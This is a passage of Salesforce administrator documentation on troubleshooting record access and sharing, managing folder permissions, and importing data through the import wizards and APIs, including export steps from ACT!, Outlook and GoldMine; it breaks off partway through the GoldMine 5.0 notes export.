Table 1: Troubleshooting guideline for user access to a record

DescriptionAccess Type

The record owner always gets access to his or her own record.Record owner

Corresponds to the “Associated record owner or sharing” entry in the Reason column of the Sharing
Detail page. The user may have access to a child record of an account (opportunity, case, or contact),

Implicit access

which grants them Read access on that account. You cannot overwrite this access. For example, if the
user has access to a case record, he or she has implicit Read access to the parent account record.

Check if the defaults for the account object are set to Private. If it is, the user may have gained access
via other methods listed here. It must be set to Private if at least one of your users should not see a
record.

Organization-wide
sharing default

The user may have inherited Read access from a subordinate in the role hierarchy. You can’t override
this behavior for non-custom objects. If the user who has access is on a different branch of the hierarchy
from the account owner, check the sharing rules, account teams, and account territory.

Role hierarchy

The user may have gotten access because he or she has been included in a relevant sharing rule. If the
sharing rule uses public groups (or other categories such as roles) to grant access, check your public
groups to see if the user has been included in the group.

Sharing rules

The user may have gotten access through the Sharing button of the record. Only the record owner,
an administrator, or a user above the owner in the role hierarchy can create or remove a manual share
on the record.

Manual shares
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DescriptionAccess Type

The user may have been added to an Account Team by the account owner, an administrator, a user
above the owner in the role hierarchy, or an account team member. If your organization uses territory

Account Teams and
Territory

management, check if the user who has access is higher in the territory hierarchy than the account
owner. Managers gain the same access as their subordinates. Additionally, if the user is a member of
Group A, which is a member of Group B, he or she gets access to all accounts shared to Group B, at
the same level of access as members of Group B.

See Also:
Securing Data Access

Why can’t a user see a record?
You may have set the organization-wide defaults for the object to Private, set up a role hierarchy and granted access using
sharing rules, and so on. If you are not sure why a user can’t see a record, follow this troubleshooting flow.

1. Verify the user permission for the object.

Permission sets determine which app and what types of data users can see, and whether they can edit, create, or delete
records. Make sure that you have assigned the right permissions to the user.

2. Check the role hierarchy.

Identify the user’s role in relation to the record owner. If User A cannot access a record owned by User B, they are most
likely in different roles or in different branches of the role hierarchy.

3. Review the sharing rules.

You may have left out the user from the sharing rule. If User A should have gotten access in a sharing rule but did not,
check the public group (or other categories such as roles or queues) that is used for that sharing rule.

4. Check your teams.

If your organization uses teams for accounts, opportunities, or cases, you may have missed the user when setting up the
teams. Review your teams to determine if the user should have gotten access through a team.

5. Review your manual shares.

The user may have lost access because the record owner changed, causing the manual share to be dropped automatically.
The manual share could also have been removed using the Sharing button on the record detail page. Only the record
owner, an administrator, or a user above the owner in the role hierarchy can create or remove a manual share on the record.

6. Check your territories if you’re using them.

The user may be missing from the territories or the record may not be under the correct territory where the user is a member.
Review your territories if the user should have gotten access through them.

See Also:
Securing Data Access
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Managing Folders
Available in: All editions except Database.com

User Permissions Needed

“Manage Public Documents”To create, edit, or delete public document folders:

“Manage Public Templates”To create, edit, and delete public email template folders:

“Manage Public Reports”To create, edit, and delete public report folders:

“Manage Dashboards” AND “View All Data”To create, edit, and delete public dashboard folders:

A folder is a place where you can store reports, dashboards, documents, or email templates. Folders can be public, hidden, or
shared, and can be set to read-only or read/write. You control who has access to its contents based on roles, permissions, public
groups, and license types. You can make a folder available to your entire organization, or make it private so that only the owner
has access.

• To access document folders, click the Documents tab.

• To access email template folders, from Setup, click Communication Templates > Email Templates.

To create a new folder, click Create New Folder.

To edit a folder, click Edit next to the folder name. Alternatively, select a folder name from the Folder drop-down list and
click Edit.

Note:  You can modify the contents of a folder only if the folder access level is set to Read/Write. Only users with
the “Manage Public Documents” or “Manage Public Templates” can delete or change a Read Only folder. Regardless
of permissions or folder settings, users can't edit any unfiled or personal folders.

See Also:
Creating and Editing Folders
Deleting Folders
Filing Items in Folders
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Creating and Editing Folders

Available in: All Editions except Database.com

Report folders not available in: Contact Manager, Group, and Personal Editions

User Permissions Needed

“Manage Public Documents”To create, edit, or delete public document folders:

“Manage Public Templates”To create, edit, and delete public email template folders:

“Manage Public Reports”To create, edit, and delete public report folders:

“Manage Dashboards” AND “View All Data”To create, edit, and delete public dashboard folders:

Click Create New Folder or Edit from most pages that list folders.

1. Enter a Folder Label. The label is used to refer to the folder on user interface pages.
2. If you have the “Customize Application” permission, enter a unique name to be used by the API and managed packages.
3. Choose a Public Folder Access option. Select read/write if you want users to be able to change the folder contents.

A read-only folder can be visible to users but they can't change its contents.
4. Select an unfiled report, dashboard, or template and click Add to store it in the new folder. Skip this step for document

folders.
5. Choose a folder visibility option:

• This folder is accessible by all users, including portal users gives folder access to all users
in your organization, including portal users.

• This folder is accessible by all users, except for portal users gives folder access to all users
in your organization, but denies access to portal users. This option is only available for report and dashboard folders in
organizations with a partner portal or Customer Portal enabled. If you don't have a portal, you won't see it.

• This folder is hidden from all users makes the folder private.
• This folder is accessible only by the following users allows you to grant access to a desired set of

users:

a. Choose “Public Groups”, “Roles,” “Roles and Subordinates,” “Roles, Internal and Portal Subordinates” (if you have
portals enabled), “Territories,” or “Territories and Subordinates” from the Search drop-down list. The choices
vary by Edition and whether your organization has territory management.

Note:  When you share a folder with a group, managers of the group members have no access to the folder
unless those managers are also members of the group.

b. If the Available for Sharing list does not immediately display the desired value, enter search criteria and
click Find.

c. Select the desired value from the Available for Sharing list and click Add to move the value to the Shared
To list.

431

Managing FoldersManage User Access to Data



6. Click Save.

See Also:
Managing Folders

Deleting Folders

Available in: All Editions except Database.com

Report folders not available in: Contact Manager, Group, and Personal Editions

User Permissions Needed

“Manage Public Documents”To create, edit, or delete public document folders:

“Manage Public Templates”To create, edit, and delete public email template folders:

“Manage Public Reports”To create, edit, and delete public report folders:

“Manage Dashboards” AND “View All Data”To create, edit, and delete public dashboard folders:

You can only delete folders that are empty. Before you begin, remove all the documents, dashboards, templates, or reports
from the folder you would like to delete.

1. Click Edit next to the folder name from any page that lists folders. On the Reports tab, click  then Edit in the Folders
pane.

2. Click Delete or  then Delete.
3. Click OK to confirm.

See Also:
Managing Folders
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Filing Items in Folders

Available in: All Editions except Database.com

Report folders not available in: Contact Manager, Group, and Personal Editions

User Permissions Needed

“Manage Public Documents”To create, edit, or delete public document folders:

“Manage Public Templates”To create, edit, and delete public email template folders:

“Manage Public Reports”To create, edit, and delete public report folders:

“Manage Dashboards” AND “View All Data”To create, edit, and delete public dashboard folders:

To move a document, dashboard, report, or email template to a different folder:

1. Select the item to be stored in a folder.
2. Click Edit Properties.
3. Choose another folder.
4. Click Save.

Just like report folders contain reports and email template folders contain email templates, document folders can only contain
documents. To store an attachment in a document folder, save the attachment to your computer and upload it to the document
library.

Note:  Email templates that are used by Web-to-Case, Web-to-Lead, assignment rules, or escalation rules must be
marked as “Available for Use.”

See Also:
Managing Folders
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IMPORT YOUR DATA

Importing Overview
Your edition determines the types of objects you can import.

You can import data from ACT!, Outlook, and any program that can save data in the CSV (comma-separated values) format,
such as Excel or GoldMine.

Note:  If commas are not appropriate for your locale, use a tab or other delimiter.

The following table summarizes the kinds of records that can be imported.

Which records can be imported?

Overview topicUsers with accessImport record limitType of record

What Is Imported for
Business Accounts and
Contacts?

All users500 at a timeBusiness accounts and contacts
owned by you

What Is Imported for
Business Accounts and
Contacts?

Administrators;

Users with the “Modify All
Data” permission

50,000 at a timeBusiness accounts and contacts
owned by different users

What Is Imported for Person
Accounts?

All users50,000 at a timePerson accounts owned by you

What Is Imported for Person
Accounts?

Administrators;

Users with the “Import Person
Accounts” permission

50,000 at a timePerson accounts owned by
different users

What is Imported for Leads?Administrators;

Users with “Read”, “Create”,
and “Edit” on leads and the
“Import Leads” permission

50,000 at a timeLeads

What is Imported for
Campaign Members?

Administrators;

Marketing users (or users with
the “Import Leads” permission

50,000 for importing leads as
new campaign members and
updating the status of existing
campaign members.

Campaign members

and the “Edit” permission on
campaigns) can import new
leads as campaign members.
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Which records can be imported?

Overview topicUsers with accessImport record limitType of record

Users also need the “Read”
permission on contacts to use
the campaign update wizard
to make existing leads and
contacts campaign members.

What Is Imported for Custom
Objects?

Administrators;

Users with the “Modify All
Data” permission

50,000 at a timeCustom objects

What Is Imported for
Solutions?

Administrators;

Users with the “Import
Solutions” permission

50,000 at a timeSolutions

These records cannot be imported via the import wizards.Assets

Cases

Campaigns

Contracts

Documents

Opportunities

Products

For information on field accessibility and how different field type values are imported, see Notes on Importing Data on page
444.

Process for Importing Records
To import records into Salesforce, follow the steps in these topics:

1. Creating Export Files for Import Wizards
2. Preparing Your Data for Import
3. Accessing the Import Wizards

Note:  In addition to the record limits on each import, your import is also subject to the overall storage limits for your
organization.

Although they are custom objects, relationship group members cannot be imported.

See Also:
Which Data Import/Export Tool Should I Use?
Undoing an Import
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Which Data Import/Export Tool Should I Use?
Salesforce offers the following tools and APIs to import and export data.

Use the table below to determine which tool you should use, based on how many records you need to import or export, whether
you need to import or export, and whether the tool is internal or external to Salesforce.

Additional informationInternal or
external to
Salesforce

ExportImportNumber of
records you can
import or export

Editions
supported

Tool

An in-browser wizard that
imports your personal and

InternalNoYesUp to 50,000Contact
Manager,

Import Wizard
for Accounts
and Contacts organization’s accounts and

contacts. Read more.
Group,
Professional,
Enterprise,
Unlimited, and
Developer
Editions

An in-browser wizard that
imports your organization’s
leads. Read more.

InternalNoYesUp to 50,000Group,
Professional,
Enterprise,
Unlimited, and

Import Wizard
for Leads

Developer
Editions

An in-browser wizard that
imports your organization’s
solutions. Read more.

InternalNoYesUp to 50,000Professional,
Enterprise,
Unlimited, and
Developer
Editions

Solution Import
Wizard

An in-browser wizard that
imports your organization’s
custom objects. Read more.

InternalNoYesUp to 50,000Contact
Manager,
Group,
Professional,

Custom Object
Import Wizard

Enterprise,
Unlimited, and
Developer
Editions

An in-browser wizard that
exports data in .zip files that are

InternalYesNoNo limitWeekly export
available in

Data Export

up to 128 MB each on aEnterprise and
monthly or weekly basis. Read
more.

Unlimited
Editions.
Monthly export
available in all
editions, except
Database.com
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Additional informationInternal or
external to
Salesforce

ExportImportNumber of
records you can
import or export

Editions
supported

Tool

Data Loader is a client
application for the bulk import

ExternalYesYesBetween 5,000
and 5 million

Enterprise,
Unlimited,
Developer, and

Data Loader

or export of data. Use it toDatabase.com
Editions insert, update, delete, or export

Salesforce records.
Read more.

See the AppExchange for
available tools.

ExternalVariesVariesOver 5 millionVariesThird-party
tools

Free data migration tool offered
by a salesforce.com, inc.
partner. Read more.

ExternalYesYesOver 5 millionAll editionsJitterbit Data
LoaderTM for
Salesforce
(third-party
tool)

Workbench is a free, open
source, community-supported

ExternalYesYesOne record at a
time or a batch

Enterprise,
Unlimited,

Workbench

tool (see the Help page incontaining up to
10,000 records

Developer, and
Database.com
Editions

Workbench). Salesforce.com
provides a hosted instance of
Workbench for demonstration
purposes only—salesforce.com
recommends that you do not
use this hosted instance of
Workbench to access data in a
production database. If you
want to use Workbench for
your production database, you
can download, host, and
configure it using your own
resources. Read more.

Salesforce.com provides APIs that enable data integration with Salesforce. Use the table below to determine which API to
use, based on how many records you need to import or export and the integration technologies required in your scenario.

Additional informationExportImportNumber of records
you can import or
export

Editions
supported

API

Use to access objects in your organization
using REST. Read more.

YesYesIntegration scenarios
where you have less
than 200 records

Developer,
Enterprise,
Unlimited, and
Database.com
Editions

REST API
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Additional informationExportImportNumber of records
you can import or
export

Editions
supported

API

Use to integrate your organization’s data
with other applications using SOAP.
Read more.

YesYesIntegration scenarios
where you have less
than 200 records

Developer,
Enterprise,
Unlimited, and
Database.com
Editions

SOAP API

Use to load or delete large numbers of
records. Read more.

YesYesOver a millionDeveloper,
Enterprise,
Unlimited, and

Bulk API

Database.com
Editions

See Also:
Importing Overview

What Is Imported for Business Accounts and Contacts?

Available in: All Editions except Database.com

Organization import not available in: Personal Edition, Database.com

The import wizards for contacts and business accounts allow you to match records in a variety of ways in order to prevent
duplicates. Contacts can be matched by Salesforce ID, name, or email. Business accounts can be matched by Salesforce ID or
by name and site. Matching by Salesforce ID is inclusive of both contacts and business accounts; if you match one by Salesforce
ID, the other will also be matched by Salesforce ID.

Matching by Name and Site

If you choose to match contacts by name and business accounts by name and site (which are the recommended options), the
import wizards automatically create a business account for each unique business account name and site in the import file. They
also create a separate contact for each contact name listed in the file. The contacts are then associated with the appropriate
business accounts.

If the business account or contact already exists in the system, and you have read/write access to the record, the wizards add
your import data to the existing data in Salesforce. In addition, if a business account or contact name in your import file is
similar to an existing business account or contact name, the import data is added to the existing data in Salesforce.

Matching by Salesforce ID

You can also choose to match contacts and business accounts by Salesforce ID. With this selected, the Salesforce ID will be
the criteria for de-duplication. That is, if you are matching by ID and a record in your source file has the same ID as a record
in Salesforce, then that record will be updated in Salesforce. Note that record IDs are case-sensitive and must match exactly.
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Overwriting Existing Account Values

The wizards never overwrite your existing business account fields unless you check the Overwrite existing account
values checkbox in the wizard. With this box checked, you can insert or update existing business account fields with new
data. However, you cannot use this checkbox to update existing field data with blank values. With this box unchecked, the
wizard updates any empty business account fields, but does not touch any fields with existing data.

If you do not have read/write access to an existing business account or contact, the wizards create a new business account or
contact owned by you. In addition, the wizards create new business accounts and contacts based on specific fields in your
import file.

In Professional, Enterprise, Unlimited, and Developer Edition organizations, the import wizards can also import new business
account and contact notes. The wizards do not import notes that are exact duplicates of existing contact or business account
notes.

See Also:
Import My Organization’s Accounts and Contacts
Which Data Import/Export Tool Should I Use?

What Is Imported for Person Accounts?

Person account import available in: Enterprise, Unlimited, and Developer Editions

The import wizards for person accounts allow you to prevent the creation of duplicate records by matching records according
to one of the following fields: Account Name, Salesforce ID, or Email. In your import file, include a column for the
field that you are using for record matching.

Note:  Your administrator may have renamed “person account” to another term. If so, the import wizard will refer
to the new name.

Matching by Name

When you select this option, the import wizard will detect existing records in Salesforce that have the same name. Note that
this type of matching is not case-sensitive - for example, names that begin with a capital letter will be matched with the same
name that begins with a lowercase letter. If necessary, scan and standardize your custom object names before performing the
import to prevent unintended matches.

Matching by Salesforce ID

A Salesforce ID is a system-generated, case-sensitive string of 15 or 18 letters and numbers that uniquely identifies each
Salesforce record. When you select this option, the import wizard will detect existing records in Salesforce that have the same
Salesforce ID. Note that Salesforce IDs are case-sensitive and must match exactly. Salesforce IDs can be obtained by running
reports that include the ID field of the record.

Matching by Email

With this option, person accounts in your import file will be matched with existing person accounts in Salesforce according
to the exact value in the Email field.
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Matching by External ID

An external ID is a custom field that has the “External ID” attribute, meaning that it contains unique record identifiers from
a system outside of Salesforce. When you select this option, the import wizard will detect existing records in Salesforce that
have the same external ID. Note that this operation is not case-sensitive - for example, “ABC” will be matched with “abc”.
However, there is an exception: if the custom field has the separate “Unique” attribute and the case-sensitive option for that
attribute is selected, uppercase and lowercase letters will not be considered identical.

If necessary, scan and standardize your external ID values before performing the import to prevent unintended matches.

When matching by external ID, if the import wizard finds duplicate records, only the first three duplicate records are reported
to you in the confirmation email.

Note:  Only account custom fields with the “External ID” attribute are available for this step. While all custom contact
fields are available on person account page layouts, custom contact fields with the “External ID” attribute are not
available as matching fields during person account import.

Ignoring or Updating Matching Records

When the import wizard detects existing records in Salesforce that match according to the field you have chosen, you can
choose one of the following actions:

• Do not update existing records and only insert new records - If there are records in your file that are new and do not
match any existing records, then insert them into Salesforce. Also, ignore any records in your file that match an existing
record, and do nothing to the existing record.

• Update existing records and do not insert any new records - If there are records in your file that match an existing record,
then update the existing record. Also, ignore any records in your file that do not match an existing record, and do not insert
them as new records.

• Update existing records and insert new records - If there are records in your file that are new and do not match any
existing records, then insert them into Salesforce. Also, if there are records in your file that match an existing record, then
update the existing record.

See Also:
Import My Person Accounts
Import My Organization's Person Accounts
Which Data Import/Export Tool Should I Use?

What is Imported for Leads?

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

You can import data into the standard lead fields and into any custom lead fields you may have, even if a particular field is
hidden or read only in your page layout or field-level security settings for leads.

Importing Leads With Matching Types

You can choose whether to match leads in your import file with existing leads in Salesforce. Leads can be matched according
to the following types: Salesforce ID, name, or email. Choosing a matching type sets the criteria for avoiding duplicate leads.
For example, if you are matching by email and a lead in your source file has the same email as a lead in Salesforce, then that
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lead will be updated in Salesforce. If you are not matching by email and a lead in your source file has the same email as a lead
in Salesforce, then a new lead will be created.

The wizards never overwrite your existing lead fields unless you check the Overwrite existing lead values checkbox
in the wizard. With this box checked, you can insert or update existing lead fields with new data. However, you cannot use
this checkbox to update existing field data with blank values. With this box unchecked, the wizard updates any empty lead
fields, but does not touch any fields with existing data.

Importing Leads Without Matching Types

If you choose a matching type of “None” in the lead import wizard, for each lead in your import file, the Import My
Organization’s Leads wizard creates a new lead in Salesforce. You can merge leads after they are imported.

See Also:
Import My Organization’s Leads
Which Data Import/Export Tool Should I Use?

What is Imported for Campaign Members?

Available in: Professional, Enterprise, Unlimited, and Developer Editions

• Import Leads Wizard - For each lead in your import file, this wizard imports the lead, associates the lead with a campaign,
and inserts a Member Status value for the lead in that campaign. You can import data into the standard lead fields and
into any custom lead fields, even if a particular field is hidden or read only in your page layout or field-level security settings.
If you have duplicate leads in your import file, the wizard does not merge them. In addition, if any of the imported leads
match an existing lead, the wizard does not merge the duplicate data into one lead.

• Campaign Update Wizard - For each contact or lead in your import file, this wizard updates only the Member Status
value of the matching contact or lead in Salesforce. You cannot add new leads or contacts, nor can you update any other
fields in the existing lead or contact records.

See Also:
Which Data Import/Export Tool Should I Use?
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What Is Imported for Custom Objects?

Custom object import available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Modify All Data”To import custom objects:

The import wizard for custom objects allows you to prevent the creation of duplicate records by matching records according
to one of the following fields: custom object name, Salesforce ID, or external ID. In your import file, include a column for
the field that you are using for record matching.

Matching by Name

When you select this option, the import wizard will detect existing records in Salesforce that have the same name. Note that
this type of matching is not case-sensitive - for example, names that begin with a capital letter will be matched with the same
name that begins with a lowercase letter. If necessary, scan and standardize your custom object names before performing the
import to prevent unintended matches.

Matching by Salesforce ID

A Salesforce ID is a system-generated, case-sensitive string of 15 or 18 letters and numbers that uniquely identifies each
Salesforce record. When you select this option, the import wizard will detect existing records in Salesforce that have the same
Salesforce ID. Note that Salesforce IDs are case-sensitive and must match exactly. Salesforce IDs can be obtained by running
reports that include the ID field of the record.

Matching by External ID

An external ID is a custom field that has the “External ID” attribute, meaning that it contains unique record identifiers from
a system outside of Salesforce. When you select this option, the import wizard will detect existing records in Salesforce that
have the same external ID. Note that this operation is not case-sensitive - for example, “ABC” will be matched with “abc”.
However, there is an exception: if the custom field has the separate “Unique” attribute and the case-sensitive option for that
attribute is selected, uppercase and lowercase letters will not be considered identical.

If necessary, scan and standardize your external ID values before performing the import to prevent unintended matches.

When matching by external ID, if the import wizard finds duplicate records, only the first three duplicate records are reported
to you in the confirmation email.

Ignoring or Updating Matching Records

When the import wizard detects existing records in Salesforce that match according to the field you have chosen, you can
choose one of the following actions:

• Do not update existing records and only insert new records - If there are records in your file that are new and do not
match any existing records, then insert them into Salesforce. Also, ignore any records in your file that match an existing
record, and do nothing to the existing record.

• Update existing records and do not insert any new records - If there are records in your file that match an existing record,
then update the existing record. Also, ignore any records in your file that do not match an existing record, and do not insert
them as new records.
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• Update existing records and insert new records - If there are records in your file that are new and do not match any
existing records, then insert them into Salesforce. Also, if there are records in your file that match an existing record, then
update the existing record.

Note: Custom objects with two master-detail relationships cannot be imported using the import wizard.

See Also:
Import My Organization's Custom Objects
Which Data Import/Export Tool Should I Use?

What Is Imported for Solutions?

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Import Solutions”To import solutions:

The import wizard for solutions allows you to prevent the creation of duplicate records by matching records according to one
of the following fields: solution title, Salesforce ID, or external ID. In your import file, include a column for the field that you
are using for record matching.

Matching by Solution Title

When you select this option, the import wizard will detect existing solutions in Salesforce that have the same title. Note that
this type of matching is not case-sensitive - for example, titles that begin with a capital letter will be matched with the same
title that begins with a lowercase letter. If necessary, scan and standardize your solution titles before performing the import
to prevent unintended matches.

Matching by Salesforce ID

A Salesforce ID is a system-generated, case-sensitive string of 15 or 18 letters and numbers that uniquely identifies each
Salesforce record. When you select this option, the import wizard will detect existing records in Salesforce that have the same
Salesforce ID. Note that Salesforce IDs are case-sensitive and must match exactly. Salesforce IDs can be obtained by running
reports that include the ID field of the record.

Matching by External ID

An external ID is a custom field that has the “External ID” attribute, meaning that it contains unique record identifiers from
a system outside of Salesforce. When you select this option, the import wizard will detect existing records in Salesforce that
have the same external ID. Note that this operation is not case-sensitive - for example, “ABC” will be matched with “abc”.
However, there is an exception: if the custom field has the separate “Unique” attribute and the case-sensitive option for that
attribute is selected, uppercase and lowercase letters will not be considered identical.

If necessary, scan and standardize your external ID values before performing the import to prevent unintended matches.
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When matching by external ID, if the import wizard finds duplicate records, only the first three duplicate records are reported
to you in the confirmation email.

Ignoring or Updating Matching Records

When the import wizard detects existing records in Salesforce that match according to the field you have chosen, you can
choose one of the following actions:

• Do not update existing records and only insert new records - If there are records in your file that are new and do not
match any existing records, then insert them into Salesforce. Also, ignore any records in your file that match an existing
record, and do nothing to the existing record.

• Update existing records and do not insert any new records - If there are records in your file that match an existing record,
then update the existing record. Also, ignore any records in your file that do not match an existing record, and do not insert
them as new records.

• Update existing records and insert new records - If there are records in your file that are new and do not match any
existing records, then insert them into Salesforce. Also, if there are records in your file that match an existing record, then
update the existing record.

See Also:
Import My Organization's Solutions
Which Data Import/Export Tool Should I Use?

Notes on Importing Data

Your edition determines the types of objects you can import.

• Field Accessibility—In the organization-wide import wizards for accounts and leads, you can import data into any standard
or custom field even if it is hidden or read only in your page layout or field-level security settings.

For the Import My Contacts wizard, you can import data only into the fields that are editable for you in your page layout
or field-level security settings.

Field-level security is available in Enterprise, Unlimited, and Developer Editions only.

• New Values for Picklists and Multi-Select Picklists—If your import file contains data to be displayed in picklists or
multi-select picklists, the wizards warn you when you attempt to import a new picklist value that does not match any valid
picklist values. If you ignore the warning, the new value is automatically added to the imported record. Your administrator
can later edit the field to add the necessary values. Note that the import wizards do not allow you to import more than 100
new picklist or multi-select picklist values for any field during a single import.

If your organization uses the Translation Workbench, the import wizards look for matching translated values before creating
new inactive picklist values.

• Multi-Select Picklists—To import multiple values into a multi-select picklist, separate the values by a semicolon in your
import file.

You can import up to 100 values at a time in a multi-select picklist field. If you have more than 100 values in your import
file for any one record, the import wizard leaves the field blank in that record.

• Checkboxes—To import data into a checkbox field, use 1 for checked values and 0 for unchecked values.
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• Default Values—For picklist, multi-select picklist, and checkbox fields, if you do not map the field in the import wizard,
the default value for the field, if any, is automatically inserted into the new or updated record.

• Date/Time Fields—Ensure that the format of any date/time fields you are importing matches how they display in Salesforce
per your locale setting.

• Formula Fields—Formula fields cannot accept imported data because they are read only.

• Field Validation Rules—Salesforce runs validation rules on records before they are imported. Records that fail validation
aren’t imported. Consider deactivating the appropriate validation rules before running an import if they affect the records
you are importing.

• Universally Required Fields—You must include universally required fields in your import files or the import will fail.

See Also:
Which Data Import/Export Tool Should I Use?
Importing Overview

Importing Multiple Currencies

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

If your organization has set up the ability to use multiple currencies, you can import amounts in different currencies.

Import My Accounts and Contacts

For personal imports, all amounts in new accounts and contacts are imported in your personal currency. When import updates
amounts in existing records, the amounts in your file are converted from your personal currency to the currency of the account
or contact.

For example, if your personal currency is U.S. dollars, and your import file has 100 as the annual revenue of an existing account
with Account Currency of euros, then the new Annual Revenue value of the account will be EUR 92, assuming a
conversion rate of 0.92 and “EUR” as the currency code for euros.

Organization Import

When importing accounts, contacts, custom objects, leads, or solutions for your organization, you can specify the currency
type for amount fields using the Currency ISO Code column in your import file. The following rules apply:

• Entering currency codes - Enter a currency code in the Currency ISO Code column in your import file. Currency
codes are three letter codes that follow an international standard. For example, USD is the currency code for U.S. dollars.
From Setup, click Company Profile > Manage Currencies to see a list of valid codes for your organization.

• Using one currency for accounts and contacts - If you are importing accounts and contacts, the Currency ISO Code
column applies to both an account and its associated contact. You cannot specify different currencies for associated accounts
and contacts.

• Updating the currency code - When updating the currency code but not the currency amount for existing accounts and
contacts, the existing amount is not converted to the corresponding number in the new currency.

• Entering inactive currencies - If your enter an inactive currency in your import file, your personal currency will be used
instead. However, amounts will not be modified. For example, if your file has AUD 100 for 100 Australian dollars but
AUD is an inactive currency for your organization, then it is imported as USD 100, assuming your personal currency is
U.S. dollars.
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• Omitting the Currency ISO Code column - When creating new records via importing, if you do not use the Currency
ISO Code column or fail to map it, your personal currency is used. For example, if your file has 100 and your personal
currency is U.S. dollars (currency code = USD), this is imported as USD 100.

When updating existing records via importing, if you do not use the Currency ISO Code column or fail to map it, any
amounts are interpreted as having the existing currency of the record. For example, if your file has 100 for a record that
has a currency of EUR (the currency code for euros), this amount is interpreted as EUR 100.

Creating Export Files for Import Wizards
Available in: All Editions except Database.com

To import data into Salesforce, you first need to export the data from your existing application. This creates an export file of
the information you want to import.

• Exporting from ACT!

• Exporting from Outlook

• Exporting from GoldMine 4.0

• Exporting from GoldMine 5.0

• Exporting from Palm Desktop

• Exporting from Other Data Sources

• Exporting from Salesforce

After creating the export file, compare your data with the Salesforce fields available for import, and verify that your data will
be mapped into the appropriate Salesforce fields. See Preparing Your Data for Import on page 452.

Your file can contain a mixture of some new records as well as updates for existing records. The option selected in the Matching
Type field determines whether it is a new or existing record. When importing leads, you can choose whether to match leads
in your import file with existing leads in Salesforce. Leads can be matched according to the following types: Salesforce ID,
name, or email. Choosing a matching type sets the criteria for avoiding duplicate leads. For example, if you are matching by
email and a lead in your source file has the same email as a lead in Salesforce, then that lead will be updated in Salesforce. If
you are not matching by email and a lead in your source file has the same email as a lead in Salesforce, then a new lead will
be created.

Note:

If you are the administrator and are importing for multiple users, you must combine your export data into a single
CSV file using Excel.

When importing new records, add or modify a Record Owner field in your file such that the field contains the
names of existing, active users. Enter the users’ full usernames (for example, “jsmith@acme.com”) or first and last
names (for example, “Joe Smith”, or “Smith Joe” for Asian locales). This will specify the owner of the imported data
for an organization import. For lead imports, you can also specify the name of a lead queue. Record owner fields do
not get updated when records are updated via import. All records retain their existing owners; and the Record
Owner field in your import file is ignored for these records.

When importing leads, you can alternatively use a lead assignment rule to specify the owners of the imported data,
instead of using a Record Owner field.
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Exporting from ACT!
ACT! allows you to export contact data in a text-delimited format which can then be imported. To export contact data from
ACT! (versions 4.0 or 2000):

1. Launch ACT! and open your database.
2. Select File > Data Exchange > Export....
3. Select the file type Text-Delimited.
4. Choose a file name and location for the exported data and click Next.
5. Select Contact records only.
6. Click the Options... button.
7. Select Comma for the field separator character.

Note:  If commas are not appropriate for your locale, use a tab or other delimiter.

8. Select Yes, export field names and click OK.
9. Click Next.
10. Select All Records and then click Next.
11. Leave the export field order list alone, and click Finish.

See Also:
Default Field Mapping for ACT!
Creating Export Files for Import Wizards

Exporting from Outlook
Microsoft® Outlook® allows you to export data in a CSV (comma-separated values) format which can then be imported.

1. Launch Outlook.
2. Select File > Import and Export....
3. Choose Export to a file and click Next.
4. Choose Comma Separated Values (Windows) and click Next.

Note:  If commas are not appropriate for your locale, use a tab or other delimiter.

5. Select the Contacts folder and click Next. You can select a different contacts folder if you have contacts stored in multiple
folders.

6. Choose a file name for the exported data and click Next.
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7. Click Finish.

See Also:
Default Field Mapping for Outlook
Creating Export Files for Import Wizards

Exporting from GoldMine 4.0
GoldMine 4.0 allows you to export contact data in a text format that can be imported. Additionally, you can export GoldMine
4.0 notes for import into Professional, Enterprise, Unlimited, and Developer Edition organizations.

• Exporting Contacts from GoldMine 4.0

• Exporting Notes from GoldMine 4.0

Exporting Contacts from GoldMine 4.0

To export contact data from GoldMine 4.0, follow these steps:

1. Launch GoldMine 4.0.
2. Choose Export Records from the Tools menu.
3. Select Export to a new file and DBF file, and click Next.
4. In the list of GoldMine Fields on the left side of the dialog, select all of the fields, and click Add Field. Then click Next.
5. Choose the location for the export file, and click Next.
6. Select No when asked if you want to save these settings, and click Next.
7. Click Finish.
8. After the export finishes, locate the exported file and change its file extension from .dbf to .csv. The file is now ready for

import into Salesforce.

Exporting Notes from GoldMine 4.0

Before importing your GoldMine 4.0 notes into Salesforce, you must import your GoldMine 4.0 contacts.

To export notes from GoldMine 4.0, follow these steps:

1. Launch GoldMine 4.0.
2. Choose Export Records from the Tools menu.
3. Select Export to a new file and ASCII file, and click Next.
4. In the list of GoldMine Fields on the left side of the dialog, select the company, lastname, and notes fields, and click

Add Field. Then click Next.
5. Choose the location for the export file, and click Next.
6. Select No when asked if you want to save these settings, and click Next.
7. Click Finish.
8. After the export finishes, locate the exported file and change its file extension to .csv.
9. Open the file.
10. Add a header column by right-clicking on the first row and choosing Insert.
11. In column A, enter Company.
12. In column B, enter Last Name.
13. In column C, enter Note.
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14. If necessary, clean up the file prior to importing it. Common problems include notes that have been broken between
columns (this occurs when notes contain quotation marks).

See Also:
Field Mapping for Other Data Sources and Organization Import
Creating Export Files for Import Wizards

Exporting from GoldMine 5.0
GoldMine 5.0 allows you to export contact data in a text format that can be imported. Additionally, you can export GoldMine
5.0 notes for import into Professional, Enterprise, Unlimited, and Developer Edition organizations.

• Exporting Contacts from GoldMine 5.0

• Exporting Notes from GoldMine 5.0

Exporting Contacts from GoldMine 5.0

To export contact data from GoldMine 5.0, follow these steps:

1. Launch GoldMine 5.0.
2. Choose Tools > Import/Export Wizard > Export Contact Records.
3. Select Export to a new file and ASCII file, and click Next.
4. Select ALL Contact Records! in the drop-down list, and click Next.
5. In the list of GoldMine Fields on the left side of the dialog, select the fields you want to export, and click Add Field. We

recommend you select all fields, except the notes field. See Exporting Notes from GoldMine 5.0 on page 449 for information
on how to export notes.

6. Click Next.
7. Choose the location for the export file, select the Export GoldMine field names... checkbox, and then click Next.
8. Select No when asked if you want to save these settings, and click Next.
9. Click Finish.
10. After the export finishes, locate the exported file and change its file extension from .txt to .csv. The file is now ready for

import into Salesforce.

Exporting Notes from GoldMine 5.0

Before importing your GoldMine 5.0 notes into Salesforce, you must import your GoldMine 5.0 contacts.

To export notes from GoldMine 5.0, follow these steps:

1. Launch GoldMine 5.0.
2. Choose Tools > Import/Export Wizard > Export Contact Records.
